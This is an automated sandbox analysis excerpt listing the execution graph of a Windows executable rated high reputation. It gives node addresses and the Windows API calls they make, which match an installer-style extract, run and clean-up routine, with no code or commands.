                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                      Disassembly

                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                        Execution Coverage:28.7%
                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                        Signature Coverage:30.7%
                                                                                                                                                                                                        Total number of Nodes:962
                                                                                                                                                                                                        Total number of Limit Nodes:25
                                                                                                                                                                                                        execution_graph 3119 a96bef _XcptFilter 2196 a94ca0 GlobalAlloc 2197 a96a60 2214 a97155 2197->2214 2199 a96a65 2200 a96a76 GetStartupInfoW 2199->2200 2201 a96a93 2200->2201 2202 a96aa8 2201->2202 2203 a96aaf Sleep 2201->2203 2204 a96ac7 _amsg_exit 2202->2204 2207 a96ad1 2202->2207 2203->2201 2204->2207 2205 a96b2e __IsNonwritableInCurrentImage 2209 a96bd6 _ismbblead 2205->2209 2210 a96c1e 2205->2210 2213 a96bbe exit 2205->2213 2219 a92bfb GetVersion 2205->2219 2206 a96b13 _initterm 2206->2205 2207->2205 2207->2206 2208 a96af4 2207->2208 2209->2205 2210->2208 2211 a96c27 _cexit 2210->2211 2211->2208 2213->2205 2215 a9717a 2214->2215 2216 a9717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2214->2216 2215->2216 2217 a971e2 2215->2217 2218 a971cd 2216->2218 2217->2199 2218->2217 2220 a92c0f 2219->2220 2221 a92c50 2219->2221 2220->2221 2222 a92c13 GetModuleHandleW 2220->2222 2236 a92caa memset memset memset 2221->2236 2222->2221 2225 a92c22 GetProcAddress 2222->2225 2225->2221 2233 a92c34 2225->2233 2226 a92c8e 2228 a92c9e 2226->2228 2229 a92c97 CloseHandle 2226->2229 2228->2205 2229->2228 2233->2221 2234 a92c89 2330 a91f90 2234->2330 2347 a9468f FindResourceA SizeofResource 2236->2347 2239 a92ef3 2242 a944b9 20 API calls 2239->2242 2240 a92d2d CreateEventA SetEvent 2241 a9468f 7 API calls 2240->2241 2243 a92d57 2241->2243 2244 a92d6e 2242->2244 2245 a92d5b 2243->2245 2247 a92e1f 2243->2247 2250 a9468f 7 API calls 2243->2250 2352 a96ce0 2244->2352 2357 a944b9 2245->2357 2386 a95c9e 2247->2386 2253 a92d9f 2250->2253 2251 a92c62 2251->2226 2277 a92f1d 2251->2277 2253->2245 2256 a92da3 CreateMutexA 2253->2256 2254 a92e3a 2257 a92e43 2254->2257 2258 a92e52 FindResourceA 2254->2258 2255 a92e30 2255->2239 2256->2247 2259 a92dbd GetLastError 2256->2259 2412 a92390 2257->2412 2260 a92e6e 2258->2260 2261 a92e64 LoadResource 2258->2261 2259->2247 2263 a92dca 2259->2263 2266 a92e4d 2260->2266 2427 a936ee GetVersionExA 2260->2427 2261->2260 2264 a92dea 2263->2264 2265 a92dd5 2263->2265 2268 a944b9 20 API calls 2264->2268 2267 a944b9 20 API calls 2265->2267 2266->2244 2269 a92de8 2267->2269 2270 a92dff 2268->2270 2272 a92e04 CloseHandle 2269->2272 2270->2247 2270->2272 2272->2244 2278 a92f6c 2277->2278 2279 a92f3f 2277->2279 2571 a95164 2278->2571 2281 a92f5f 2279->2281 2552 a951e5 2279->2552 2699 a93a3f 2281->2699 2282 a92f71 2313 a9303c 2282->2313 2584 a955a0 2282->2584 2289 a96ce0 4 API calls 2291 a92c6b 2289->2291 2290 a92f86 GetSystemDirectoryA 2292 a9658a CharPrevA 2290->2292 2317 a952b6 2291->2317 2293 a92fab LoadLibraryA 2292->2293 2294 a92fc0 GetProcAddress 2293->2294 2295 a92ff7 FreeLibrary 2293->2295 2294->2295 2296 a92fd6 DecryptFileA 2294->2296 2297 a93017 SetCurrentDirectoryA 2295->2297 2298 a93006 2295->2298 2296->2295 2308 a92ff0 2296->2308 2299 a93054 2297->2299 2300 a93026 2297->2300 2298->2297 2632 a9621e GetWindowsDirectoryA 2298->2632 2304 a93061 2299->2304 2642 a93b26 2299->2642 2302 a944b9 20 API calls 2300->2302 2307 a93037 2302->2307 2306 a9307a 2304->2306 2304->2313 2651 a9256d 2304->2651 2311 a93098 2306->2311 2662 a93ba2 2306->2662 2718 a96285 GetLastError 2307->2718 2308->2295 2311->2313 2315 a930af 2311->2315 2313->2289 2720 a94169 2315->2720 2318 a952d6 2317->2318 2324 a95316 2317->2324 2319 a95300 LocalFree LocalFree 2318->2319 2321 a952eb SetFileAttributesA DeleteFileA 2318->2321 2319->2318 2319->2324 2320 a9538c 2323 a96ce0 4 API calls 2320->2323 2321->2319 2322 a95374 2322->2320 3050 a91fe1 2322->3050 2326 a92c72 2323->2326 2324->2322 2327 a9535e SetCurrentDirectoryA 2324->2327 2328 a965e8 4 API calls 2324->2328 2326->2226 2326->2234 2329 a92390 13 API calls 2327->2329 2328->2327 2329->2322 2331 a91f9a 2330->2331 2332 a91f9f 2330->2332 2333 a91ea7 15 API calls 2331->2333 2334 a91fc0 2332->2334 2335 a944b9 20 API calls 2332->2335 2338 a91fd9 2332->2338 2333->2332 2336 a91ee2 GetCurrentProcess OpenProcessToken 2334->2336 2337 a91fcf ExitWindowsEx 2334->2337 2334->2338 2335->2334 2340 a91f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2336->2340 2342 a91f0e 2336->2342 2337->2338 2338->2226 2341 a91f6b ExitWindowsEx 2340->2341 2340->2342 2341->2342 2343 a91f1f 2341->2343 2344 a944b9 20 API calls 2342->2344 2345 a96ce0 4 API calls 2343->2345 2344->2343 2346 a91f8c 2345->2346 2346->2226 2348 a92d1a 2347->2348 2349 a946b6 2347->2349 2348->2239 2348->2240 2349->2348 2350 a946be FindResourceA LoadResource LockResource 2349->2350 2350->2348 2351 a946df memcpy_s FreeResource 2350->2351 2351->2348 2353 a96ce8 2352->2353 2354 a96ceb 2352->2354 2353->2251 2469 a96cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2354->2469 2356 a96e26 2356->2251 2358 a9455a 2357->2358 2359 a944fe LoadStringA 2357->2359 2363 a96ce0 4 API calls 2358->2363 2360 a94562 2359->2360 2361 a94527 2359->2361 2366 a945c9 2360->2366 2373 a9457e 2360->2373 2362 a9681f 10 API calls 2361->2362 2364 a9452c 2362->2364 2365 a94689 2363->2365 2367 a94536 MessageBoxA 2364->2367 2482 a967c9 2364->2482 2365->2244 2369 a945cd LocalAlloc 2366->2369 2370 a94607 LocalAlloc 2366->2370 2367->2358 2369->2358 2377 a945f3 2369->2377 2370->2358 2372 a945c4 2370->2372 2375 a9462d MessageBeep 2372->2375 2373->2373 2376 a94596 LocalAlloc 2373->2376 2470 a9681f 2375->2470 2376->2358 2379 a945af 2376->2379 2380 a9171e _vsnprintf 2377->2380 2488 a9171e 2379->2488 2380->2372 2383 a94645 MessageBoxA LocalFree 2383->2358 2384 a967c9 EnumResourceLanguagesA 2384->2383 2393 a95e17 2386->2393 2409 a95cc3 2386->2409 2387 a95dd0 2391 a95dec GetModuleFileNameA 2387->2391 2387->2393 2388 a96ce0 4 API calls 2390 a92e2c 2388->2390 2389 a95ced CharNextA 2389->2409 2390->2254 2390->2255 2392 a95e0a 2391->2392 2391->2393 2498 a966c8 2392->2498 2393->2388 2395 a96218 2507 a96e2a 2395->2507 2398 a95e36 CharUpperA 2399 a961d0 2398->2399 2398->2409 2400 a944b9 20 API calls 2399->2400 2401 a961e7 2400->2401 2402 a961f0 CloseHandle 2401->2402 2403 a961f7 ExitProcess 2401->2403 2402->2403 2404 a95f9f CharUpperA 2404->2409 2405 a95f59 CompareStringA 2405->2409 2406 a96003 CharUpperA 2406->2409 2407 a95edc CharUpperA 2407->2409 2408 a960a2 CharUpperA 2408->2409 2409->2387 2409->2389 2409->2393 2409->2395 2409->2398 2409->2404 2409->2405 2409->2406 2409->2407 2409->2408 2410 a9667f IsDBCSLeadByte CharNextA 2409->2410 2503 a9658a 2409->2503 2410->2409 2413 a924cb 2412->2413 2416 a923b9 2412->2416 2414 a96ce0 4 API calls 2413->2414 2415 a924dc 2414->2415 2415->2266 2416->2413 2417 a923e9 FindFirstFileA 2416->2417 2417->2413 2418 a92407 2417->2418 2419 a92479 2418->2419 2420 a92421 lstrcmpA 2418->2420 2421 a924a9 FindNextFileA 2418->2421 2425 a9658a CharPrevA 2418->2425 2426 a92390 5 API calls 2418->2426 2423 a92488 SetFileAttributesA DeleteFileA 2419->2423 2420->2421 2422 a92431 lstrcmpA 2420->2422 2421->2418 2424 a924bd FindClose RemoveDirectoryA 2421->2424 2422->2418 2422->2421 2423->2421 2424->2413 2425->2418 2426->2418 2428 a9372d 2427->2428 2432 a93737 2427->2432 2429 a944b9 20 API calls 2428->2429 2441 a939fc 2428->2441 2429->2441 2430 a96ce0 4 API calls 2431 a92e92 2430->2431 2431->2244 2431->2266 2442 a918a3 2431->2442 2432->2428 2434 a938a4 2432->2434 2432->2441 2514 a928e8 2432->2514 2434->2428 2435 a939c1 MessageBeep 2434->2435 2434->2441 2436 a9681f 10 API calls 2435->2436 2437 a939ce 2436->2437 2438 a939d8 MessageBoxA 2437->2438 2440 a967c9 EnumResourceLanguagesA 2437->2440 2438->2441 2440->2438 2441->2430 2443 a919b8 2442->2443 2444 a918d5 2442->2444 2446 a96ce0 4 API calls 2443->2446 2543 a917ee LoadLibraryA 2444->2543 2448 a919d5 2446->2448 2448->2266 2462 a96517 FindResourceA 2448->2462 2449 a918e5 GetCurrentProcess OpenProcessToken 2449->2443 2450 a91900 GetTokenInformation 2449->2450 2451 a91918 GetLastError 2450->2451 2452 a919aa CloseHandle 2450->2452 2451->2452 2453 a91927 LocalAlloc 2451->2453 2452->2443 2454 a919a9 2453->2454 2455 a91938 GetTokenInformation 2453->2455 2454->2452 2456 a9194e AllocateAndInitializeSid 2455->2456 2457 a919a2 LocalFree 2455->2457 2456->2457 2461 a9196e 2456->2461 2457->2454 2458 a91999 FreeSid 2458->2457 2459 a91975 EqualSid 2460 a9198c 2459->2460 2459->2461 2460->2458 2461->2458 2461->2459 2461->2460 2463 a9656b 2462->2463 2464 a96536 LoadResource 2462->2464 2466 a944b9 20 API calls 2463->2466 2464->2463 2465 a96544 DialogBoxIndirectParamA FreeResource 2464->2465 2465->2463 2467 a9657c 2465->2467 2466->2467 2467->2266 2469->2356 2471 a96940 2470->2471 2472 a96857 GetVersionExA 2470->2472 2474 a96ce0 4 API calls 2471->2474 2473 a9687c 2472->2473 2481 a9691a 2472->2481 2476 a968a5 GetSystemMetrics 2473->2476 2473->2481 2475 a9463b 2474->2475 2475->2383 2475->2384 2477 a968b5 RegOpenKeyExA 2476->2477 2476->2481 2478 a968d6 RegQueryValueExA RegCloseKey 2477->2478 2477->2481 2479 a9690c 2478->2479 2478->2481 2492 a966f9 2479->2492 2481->2471 2483 a967e2 2482->2483 2486 a96803 2482->2486 2496 a96793 EnumResourceLanguagesA 2483->2496 2485 a967f5 2485->2486 2497 a96793 EnumResourceLanguagesA 2485->2497 2486->2367 2489 a9172d 2488->2489 2490 a9173d _vsnprintf 2489->2490 2491 a9175d 2489->2491 2490->2491 2491->2372 2494 a9670f 2492->2494 2493 a96740 CharNextA 2493->2494 2494->2493 2495 a9674b 2494->2495 2495->2481 2496->2485 2497->2486 2499 a966d5 2498->2499 2500 a966f3 2499->2500 2502 a966e5 CharNextA 2499->2502 2510 a96648 2499->2510 2500->2393 2502->2499 2504 a9659b 2503->2504 2504->2504 2505 a965b8 CharPrevA 2504->2505 2506 a965ab 2504->2506 2505->2506 2506->2409 2513 a96cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2507->2513 2509 a9621d 2511 a9665d IsDBCSLeadByte 2510->2511 2512 a96668 2510->2512 2511->2512 2512->2499 2513->2509 2515 a92a62 2514->2515 2522 a9290d 2514->2522 2516 a92a6e GlobalFree 2515->2516 2517 a92a75 2515->2517 2516->2517 2517->2434 2519 a92955 GlobalAlloc 2519->2515 2520 a92968 GlobalLock 2519->2520 2520->2515 2520->2522 2521 a92a20 GlobalUnlock 2521->2522 2522->2515 2522->2519 2522->2521 2523 a92a80 GlobalUnlock 2522->2523 2524 a92773 2522->2524 2523->2515 2525 a927a3 CharUpperA CharNextA CharNextA 2524->2525 2526 a928b2 2524->2526 2527 a927db 2525->2527 2528 a928b7 GetSystemDirectoryA 2525->2528 2526->2528 2529 a928a8 GetWindowsDirectoryA 2527->2529 2530 a927e3 2527->2530 2531 a928bf 2528->2531 2529->2531 2535 a9658a CharPrevA 2530->2535 2532 a928d2 2531->2532 2533 a9658a CharPrevA 2531->2533 2534 a96ce0 4 API calls 2532->2534 2533->2532 2536 a928e2 2534->2536 2537 a92810 RegOpenKeyExA 2535->2537 2536->2522 2537->2531 2538 a92837 RegQueryValueExA 2537->2538 2539 a9289a RegCloseKey 2538->2539 2540 a9285c 2538->2540 2539->2531 2541 a92867 ExpandEnvironmentStringsA 2540->2541 2542 a9287a 2540->2542 2541->2542 2542->2539 2544 a91890 2543->2544 2545 a91826 GetProcAddress 2543->2545 2546 a96ce0 4 API calls 2544->2546 2547 a91889 FreeLibrary 2545->2547 2548 a91839 AllocateAndInitializeSid 2545->2548 2549 a9189f 2546->2549 2547->2544 2548->2547 2550 a9185f FreeSid 2548->2550 2549->2443 2549->2449 2550->2547 2553 a9468f 7 API calls 2552->2553 2554 a951f9 LocalAlloc 2553->2554 2555 a9522d 2554->2555 2556 a9520d 2554->2556 2558 a9468f 7 API calls 2555->2558 2557 a944b9 20 API calls 2556->2557 2559 a9521e 2557->2559 2560 a9523a 2558->2560 2561 a96285 GetLastError 2559->2561 2562 a9523e 2560->2562 2563 a95262 lstrcmpA 2560->2563 2568 a92f4d 2561->2568 2566 a944b9 20 API calls 2562->2566 2564 a9527e 2563->2564 2565 a95272 LocalFree 2563->2565 2569 a944b9 20 API calls 2564->2569 2565->2568 2567 a9524f LocalFree 2566->2567 2567->2568 2568->2278 2568->2281 2568->2313 2570 a95290 LocalFree 2569->2570 2570->2568 2572 a9468f 7 API calls 2571->2572 2573 a95175 2572->2573 2574 a9517a 2573->2574 2575 a951af 2573->2575 2576 a944b9 20 API calls 2574->2576 2577 a9468f 7 API calls 2575->2577 2578 a9518d 2576->2578 2579 a951c0 2577->2579 2578->2282 2733 a96298 2579->2733 2582 a951e1 2582->2282 2583 a944b9 20 API calls 2583->2578 2585 a9468f 7 API calls 2584->2585 2586 a955c7 LocalAlloc 2585->2586 2587 a955db 2586->2587 2588 a955fd 2586->2588 2589 a944b9 20 API calls 2587->2589 2590 a9468f 7 API calls 2588->2590 2591 a955ec 2589->2591 2592 a9560a 2590->2592 2595 a96285 GetLastError 2591->2595 2593 a9560e 2592->2593 2594 a95632 lstrcmpA 2592->2594 2596 a944b9 20 API calls 2593->2596 2597 a9564b LocalFree 2594->2597 2598 a95645 2594->2598 2620 a955f1 2595->2620 2599 a9561f LocalFree 2596->2599 2600 a9565b 2597->2600 2601 a95696 2597->2601 2598->2597 2599->2620 2609 a95467 49 API calls 2600->2609 2602 a9589f 2601->2602 2603 a956ae GetTempPathA 2601->2603 2604 a96517 24 API calls 2602->2604 2607 a956eb 2603->2607 2608 a956c3 2603->2608 2604->2620 2605 a96ce0 4 API calls 2606 a92f7e 2605->2606 2606->2290 2606->2313 2614 a9586c GetWindowsDirectoryA 2607->2614 2615 a95717 GetDriveTypeA 2607->2615 2607->2620 2745 a95467 2608->2745 2611 a95678 2609->2611 2613 a944b9 20 API calls 2611->2613 2611->2620 2613->2620 2779 a9597d GetCurrentDirectoryA SetCurrentDirectoryA 2614->2779 2618 a95730 GetFileAttributesA 2615->2618 2630 a9572b 2615->2630 2618->2630 2620->2605 2621 a95467 49 API calls 2621->2607 2622 a92630 21 API calls 2622->2630 2624 a957c1 GetWindowsDirectoryA 2624->2630 2625 a9597d 34 API calls 2625->2630 2626 a9658a CharPrevA 2627 a957e8 GetFileAttributesA 2626->2627 2628 a957fa CreateDirectoryA 2627->2628 2627->2630 2628->2630 2629 a95827 SetFileAttributesA 2629->2630 2630->2614 2630->2615 2630->2618 2630->2620 2630->2622 2630->2624 2630->2625 2630->2626 2630->2629 2631 a95467 49 API calls 2630->2631 2775 a96952 2630->2775 2631->2630 2633 a96249 2632->2633 2634 a96268 2632->2634 2635 a944b9 20 API calls 2633->2635 2636 a9597d 34 API calls 2634->2636 2637 a9625a 2635->2637 2638 a9625f 2636->2638 2639 a96285 GetLastError 2637->2639 2640 a96ce0 4 API calls 2638->2640 2639->2638 2641 a93013 2640->2641 2641->2297 2641->2313 2643 a93b2d 2642->2643 2643->2643 2644 a93b72 2643->2644 2645 a93b53 2643->2645 2845 a94fe0 2644->2845 2647 a96517 24 API calls 2645->2647 2648 a93b70 2647->2648 2649 a93b7b 2648->2649 2650 a96298 10 API calls 2648->2650 2649->2304 2650->2649 2652 a92583 2651->2652 2653 a92622 2651->2653 2655 a925e8 RegOpenKeyExA 2652->2655 2656 a9258b 2652->2656 2896 a924e0 GetWindowsDirectoryA 2653->2896 2657 a92609 RegQueryInfoKeyA 2655->2657 2658 a925e3 2655->2658 2656->2658 2660 a9259b RegOpenKeyExA 2656->2660 2659 a925d1 RegCloseKey 2657->2659 2658->2306 2659->2658 2660->2658 2661 a925bc RegQueryValueExA 2660->2661 2661->2659 2663 a93bdb 2662->2663 2684 a93bec 2662->2684 2665 a9468f 7 API calls 2663->2665 2664 a93c03 memset 2664->2684 2665->2684 2666 a9468f 7 API calls 2666->2684 2667 a93d13 2668 a944b9 20 API calls 2667->2668 2670 a93d26 2668->2670 2671 a96ce0 4 API calls 2670->2671 2672 a93f60 2671->2672 2672->2311 2673 a93d7b CompareStringA 2674 a93fd7 2673->2674 2673->2684 2674->2670 2995 a92267 2674->2995 2675 a93fab 2678 a944b9 20 API calls 2675->2678 2679 a93fbe LocalFree 2678->2679 2679->2670 2680 a93f1e LocalFree 2680->2674 2680->2684 2681 a93f46 LocalFree 2681->2670 2684->2664 2684->2666 2684->2667 2684->2670 2684->2673 2684->2674 2684->2675 2684->2680 2684->2681 2685 a93cc7 CompareStringA 2684->2685 2696 a93e10 2684->2696 2904 a91ae8 2684->2904 2945 a9202a memset memset RegCreateKeyExA 2684->2945 2971 a93fef 2684->2971 2685->2684 2686 a93e1f GetProcAddress 2688 a93f64 2686->2688 2686->2696 2687 a93f92 2689 a944b9 20 API calls 2687->2689 2690 a944b9 20 API calls 2688->2690 2691 a93fa9 2689->2691 2692 a93f75 FreeLibrary 2690->2692 2693 a93f7c LocalFree 2691->2693 2692->2693 2694 a96285 GetLastError 2693->2694 2695 a93f8b 2694->2695 2695->2670 2696->2686 2696->2687 2697 a93eff FreeLibrary 2696->2697 2698 a93f40 FreeLibrary 2696->2698 2985 a96495 2696->2985 2697->2680 2698->2681 2700 a9468f 7 API calls 2699->2700 2701 a93a55 LocalAlloc 2700->2701 2702 a93a6c 2701->2702 2703 a93a8e 2701->2703 2704 a944b9 20 API calls 2702->2704 2705 a9468f 7 API calls 2703->2705 2706 a93a7d 2704->2706 2707 a93a98 2705->2707 2708 a96285 GetLastError 2706->2708 2709 a93a9c 2707->2709 2710 a93ac5 lstrcmpA 2707->2710 2714 a92f64 2708->2714 2711 a944b9 20 API calls 2709->2711 2712 a93ada 2710->2712 2713 a93b0d LocalFree 2710->2713 2715 a93aad LocalFree 2711->2715 2716 a96517 24 API calls 2712->2716 2713->2714 2714->2278 2714->2313 2715->2714 2717 a93aec LocalFree 2716->2717 2717->2714 2719 a9628f 2718->2719 2719->2313 2721 a9468f 7 API calls 2720->2721 2722 a9417d LocalAlloc 2721->2722 2723 a941a8 2722->2723 2724 a94195 2722->2724 2725 a9468f 7 API calls 2723->2725 2726 a944b9 20 API calls 2724->2726 2728 a941b5 2725->2728 2727 a941a6 2726->2727 2727->2313 2729 a941b9 2728->2729 2730 a941c5 lstrcmpA 2728->2730 2732 a944b9 20 API calls 2729->2732 2730->2729 2731 a941e6 LocalFree 2730->2731 2731->2727 2732->2731 2734 a9171e _vsnprintf 2733->2734 2735 a962c9 FindResourceA 2734->2735 2737 a962cb LoadResource LockResource 2735->2737 2738 a96353 2735->2738 2737->2738 2741 a962e0 2737->2741 2739 a96ce0 4 API calls 2738->2739 2740 a951ca 2739->2740 2740->2582 2740->2583 2742 a9631b FreeResource 2741->2742 2743 a96355 FreeResource 2741->2743 2744 a9171e _vsnprintf 2742->2744 2743->2738 2744->2735 2746 a9548a 2745->2746 2747 a9551a 2745->2747 2805 a953a1 2746->2805 2816 a958c8 2747->2816 2750 a95495 2751 a95581 2750->2751 2756 a9550c 2750->2756 2757 a954c2 GetSystemInfo 2750->2757 2753 a96ce0 4 API calls 2751->2753 2758 a9559a 2753->2758 2754 a9553b CreateDirectoryA 2759 a95577 2754->2759 2760 a95547 2754->2760 2755 a9554d 2755->2751 2763 a9597d 34 API calls 2755->2763 2761 a9658a CharPrevA 2756->2761 2768 a954da 2757->2768 2758->2620 2769 a92630 GetWindowsDirectoryA 2758->2769 2762 a96285 GetLastError 2759->2762 2760->2755 2761->2747 2764 a9557c 2762->2764 2765 a9555c 2763->2765 2764->2751 2765->2751 2767 a95568 RemoveDirectoryA 2765->2767 2766 a9658a CharPrevA 2766->2756 2767->2751 2768->2756 2768->2766 2770 a9266f 2769->2770 2771 a9265e 2769->2771 2773 a96ce0 4 API calls 2770->2773 2772 a944b9 20 API calls 2771->2772 2772->2770 2774 a92687 2773->2774 2774->2607 2774->2621 2776 a9696e GetDiskFreeSpaceA 2775->2776 2777 a969a1 2775->2777 2776->2777 2778 a96989 MulDiv 2776->2778 2777->2630 2778->2777 2780 a959bb 2779->2780 2781 a959dd GetDiskFreeSpaceA 2779->2781 2782 a944b9 20 API calls 2780->2782 2783 a95ba1 memset 2781->2783 2784 a95a21 MulDiv 2781->2784 2785 a959cc 2782->2785 2786 a96285 GetLastError 2783->2786 2784->2783 2787 a95a50 GetVolumeInformationA 2784->2787 2788 a96285 GetLastError 2785->2788 2789 a95bbc GetLastError FormatMessageA 2786->2789 2790 a95a6e memset 2787->2790 2791 a95ab5 SetCurrentDirectoryA 2787->2791 2798 a959d1 2788->2798 2792 a95be3 2789->2792 2793 a96285 GetLastError 2790->2793 2800 a95acc 2791->2800 2794 a944b9 20 API calls 2792->2794 2795 a95a89 GetLastError FormatMessageA 2793->2795 2796 a95bf5 SetCurrentDirectoryA 2794->2796 2795->2792 2796->2798 2797 a96ce0 4 API calls 2799 a95c11 2797->2799 2798->2797 2799->2607 2801 a95b0a 2800->2801 2803 a95b20 2800->2803 2802 a944b9 20 API calls 2801->2802 2802->2798 2803->2798 2828 a9268b 2803->2828 2807 a953bf 2805->2807 2806 a9171e _vsnprintf 2806->2807 2807->2806 2808 a9658a CharPrevA 2807->2808 2812 a95415 GetTempFileNameA 2807->2812 2809 a953fa RemoveDirectoryA GetFileAttributesA 2808->2809 2809->2807 2810 a9544f CreateDirectoryA 2809->2810 2811 a9543a 2810->2811 2810->2812 2814 a96ce0 4 API calls 2811->2814 2812->2811 2813 a95429 DeleteFileA CreateDirectoryA 2812->2813 2813->2811 2815 a95449 2814->2815 2815->2750 2817 a958d8 2816->2817 2817->2817 2818 a958df LocalAlloc 2817->2818 2819 a95919 2818->2819 2820 a958f3 2818->2820 2822 a9658a CharPrevA 2819->2822 2821 a944b9 20 API calls 2820->2821 2827 a95906 2821->2827 2825 a95931 CreateFileA LocalFree 2822->2825 2823 a96285 GetLastError 2824 a95534 2823->2824 2824->2754 2824->2755 2826 a9595b CloseHandle GetFileAttributesA 2825->2826 2825->2827 2826->2827 2827->2823 2827->2824 2829 a926b9 2828->2829 2830 a926e5 2828->2830 2831 a9171e _vsnprintf 2829->2831 2832 a926ea 2830->2832 2833 a9271f 2830->2833 2834 a926cc 2831->2834 2835 a9171e _vsnprintf 2832->2835 2839 a9171e _vsnprintf 2833->2839 2844 a926e3 2833->2844 2836 a944b9 20 API calls 2834->2836 2838 a926fd 2835->2838 2836->2844 2837 a96ce0 4 API calls 2840 a9276d 2837->2840 2841 a944b9 20 API calls 2838->2841 2842 a92735 2839->2842 2840->2798 2841->2844 2843 a944b9 20 API calls 2842->2843 2843->2844 2844->2837 2846 a9468f 7 API calls 2845->2846 2847 a94ff5 FindResourceA LoadResource LockResource 2846->2847 2848 a95020 2847->2848 2860 a9515f 2847->2860 2849 a95029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2848->2849 2850 a95057 2848->2850 2849->2850 2864 a94efd 2850->2864 2853 a95060 2854 a944b9 20 API calls 2853->2854 2858 a95075 2854->2858 2855 a944b9 20 API calls 2855->2858 2856 a9511d 2859 a9513a 2856->2859 2862 a944b9 20 API calls 2856->2862 2857 a95110 FreeResource 2857->2856 2858->2856 2858->2857 2859->2860 2863 a9514c SendMessageA 2859->2863 2860->2648 2861 a9507c 2861->2855 2861->2858 2862->2859 2863->2860 2866 a94f4a 2864->2866 2865 a94fa1 2868 a96ce0 4 API calls 2865->2868 2866->2865 2872 a94980 2866->2872 2869 a94fc6 2868->2869 2869->2853 2869->2861 2873 a94990 2872->2873 2874 a949c2 lstrcmpA 2873->2874 2875 a949a5 2873->2875 2877 a94a0e 2874->2877 2878 a949ba 2874->2878 2876 a944b9 20 API calls 2875->2876 2876->2878 2877->2878 2883 a9487a 2877->2883 2878->2865 2880 a94b60 2878->2880 2881 a94b92 FindCloseChangeNotification 2880->2881 2882 a94b76 2880->2882 2881->2882 2882->2865 2884 a948a2 CreateFileA 2883->2884 2886 a948e9 2884->2886 2887 a94908 2884->2887 2886->2887 2888 a948ee 2886->2888 2887->2878 2891 a9490c 2888->2891 2892 a948f5 CreateFileA 2891->2892 2894 a94917 2891->2894 2892->2887 2893 a94962 CharNextA 2893->2894 2894->2892 2894->2893 2895 a94953 CreateDirectoryA 2894->2895 2895->2893 2897 a9255b 2896->2897 2898 a92510 2896->2898 2900 a96ce0 4 API calls 2897->2900 2899 a9658a CharPrevA 2898->2899 2901 a92522 WritePrivateProfileStringA _lopen 2899->2901 2902 a92569 2900->2902 2901->2897 2903 a92548 _llseek _lclose 2901->2903 2902->2658 2903->2897 2905 a91b25 2904->2905 3009 a91a84 2905->3009 2907 a91b57 2908 a9658a CharPrevA 2907->2908 2910 a91b8c 2907->2910 2908->2910 2909 a966c8 2 API calls 2911 a91bd1 2909->2911 2910->2909 2912 a91bd9 CompareStringA 2911->2912 2913 a91d73 2911->2913 2912->2913 2914 a91bf7 GetFileAttributesA 2912->2914 2915 a966c8 2 API calls 2913->2915 2916 a91c0d 2914->2916 2917 a91d53 2914->2917 2918 a91d7d 2915->2918 2916->2917 2924 a91a84 2 API calls 2916->2924 2919 a91d64 2917->2919 2920 a91df8 LocalAlloc 2918->2920 2921 a91d81 CompareStringA 2918->2921 2922 a944b9 20 API calls 2919->2922 2920->2919 2923 a91e0b GetFileAttributesA 2920->2923 2921->2920 2930 a91d9b 2921->2930 2925 a91d6c 2922->2925 2926 a91e45 2923->2926 2933 a91e1d 2923->2933 2927 a91c31 2924->2927 2929 a96ce0 4 API calls 2925->2929 3015 a92aac 2926->3015 2928 a91c50 LocalAlloc 2927->2928 2934 a91a84 2 API calls 2927->2934 2928->2919 2931 a91c67 GetPrivateProfileIntA GetPrivateProfileStringA 2928->2931 2932 a91ea1 2929->2932 2930->2930 2935 a91dbe LocalAlloc 2930->2935 2938 a91cf8 2931->2938 2942 a91cc2 2931->2942 2932->2684 2933->2926 2934->2928 2935->2919 2939 a91de1 2935->2939 2940 a91d09 GetShortPathNameA 2938->2940 2943 a91d23 2938->2943 2941 a9171e _vsnprintf 2939->2941 2940->2943 2941->2942 2942->2925 2944 a9171e _vsnprintf 2943->2944 2944->2942 2946 a9209a 2945->2946 2954 a92256 2945->2954 2948 a9171e _vsnprintf 2946->2948 2951 a920dc 2946->2951 2947 a96ce0 4 API calls 2949 a92263 2947->2949 2950 a920af RegQueryValueExA 2948->2950 2949->2684 2950->2946 2950->2951 2952 a920fb GetSystemDirectoryA 2951->2952 2953 a920e4 RegCloseKey 2951->2953 2955 a9658a CharPrevA 2952->2955 2953->2954 2954->2947 2956 a9211b LoadLibraryA 2955->2956 2957 a92179 GetModuleFileNameA 2956->2957 2958 a9212e GetProcAddress FreeLibrary 2956->2958 2960 a921de RegCloseKey 2957->2960 2963 a92177 2957->2963 2958->2957 2959 a9214e GetSystemDirectoryA 2958->2959 2961 a92165 2959->2961 2959->2963 2960->2954 2962 a9658a CharPrevA 2961->2962 2962->2963 2963->2963 2964 a921b7 LocalAlloc 2963->2964 2965 a921cd 2964->2965 2966 a921ec 2964->2966 2967 a944b9 20 API calls 2965->2967 2968 a9171e _vsnprintf 2966->2968 2967->2960 2969 a92218 RegSetValueExA RegCloseKey LocalFree 2968->2969 2969->2954 2972 a94016 CreateProcessA 2971->2972 2983 a94106 2971->2983 2973 a94041 WaitForSingleObject GetExitCodeProcess 2972->2973 2974 a940c4 2972->2974 2977 a94070 2973->2977 2976 a96285 GetLastError 2974->2976 2975 a96ce0 4 API calls 2978 a94117 2975->2978 2979 a940c9 GetLastError FormatMessageA 2976->2979 3042 a9411b 2977->3042 2978->2684 2981 a944b9 20 API calls 2979->2981 2981->2983 2982 a94096 CloseHandle CloseHandle 2982->2983 2984 a940ba 2982->2984 2983->2975 2984->2983 2986 a964c2 2985->2986 2987 a9658a CharPrevA 2986->2987 2988 a964d8 GetFileAttributesA 2987->2988 2989 a964ea 2988->2989 2990 a96501 LoadLibraryA 2988->2990 2989->2990 2991 a964ee LoadLibraryExA 2989->2991 2992 a96508 2990->2992 2991->2992 2993 a96ce0 4 API calls 2992->2993 2994 a96513 2993->2994 2994->2696 2996 a92289 RegOpenKeyExA 